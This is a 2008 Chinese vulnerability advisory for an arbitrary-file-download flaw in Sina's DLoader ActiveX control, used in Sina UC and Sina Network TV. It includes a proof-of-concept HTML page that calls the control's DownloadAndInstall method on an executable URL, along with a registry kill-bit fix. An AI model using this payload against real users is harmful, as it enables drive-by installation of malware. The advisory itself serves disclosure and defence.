|
[推荐]新浪DLoader Class ActiveX控件任意文件下载漏洞
最后更新日期:2008-7-18 15:57(GMT)
受影响系统:
Sina UC
新浪网络电视
详细:
知道安全于近期捕获该漏洞的利用代码,在7月份网络上已经出现利用此漏洞的攻击代码.可导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到系统安装,并且随着系统启动而执行.
测试方法:
以下代码可能包含恶意行为,请勿轻易尝试,使用者风险自负.
| 以下是引用片段: <HTML><HEAD> <META http-equiv=Content-Type content=”text/html; charset=gb2312″> <META content=”MSHTML 6.00.2900.3354″ name=GENERATOR></HEAD> <BODY> <OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT> <SCRIPT> var YEtYcJsR1=”http://127.0.0.1/xxx.exe”; install[”DownloadAndInstall”](YEtYcJsR1); </SCRIPT> </BODY></HTML> |
推荐的应对方法:
目前厂商已经发布新浪网络电视修复版本并且进行强制升级.请用户及时更新软件.
UC的用户请继续关注http://www.51uc.com/进行更新.
也可以为clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A设置kill bit.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{78ABDC59-D8E7-44D3-9A76-9A0918C52B4A}]
“Compatibility Flags”=dword:00000400
安装365门神(WESEC)软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://www.scanw.com/
| 新云CMS Online.asp页面过滤不严 | 02-26 |
| 对网软网上购物系统的漏洞分析 | 01-09 |
| 测试SQL防注入脚本 | 12-21 |
| Google Xss又出跨站新漏洞 | 11-06 |
| 一次简单的html injection导致的 | 11-06 |
| 风讯、科讯漏洞利用 | 11-01 |
| Adobe pdf reader URI利用方式浅 | 10-23 |
| 超星阅览器的最新0DAY | 10-19 |
| 运用SQL Injection做数据库渗透的 | 09-22 |
| sa-blog 0day | 09-22 |
| HTML注入的一些简单想法 | 09-10 |
| 网站登陆接口的攻与防 | 09-04 |
您现在的位置: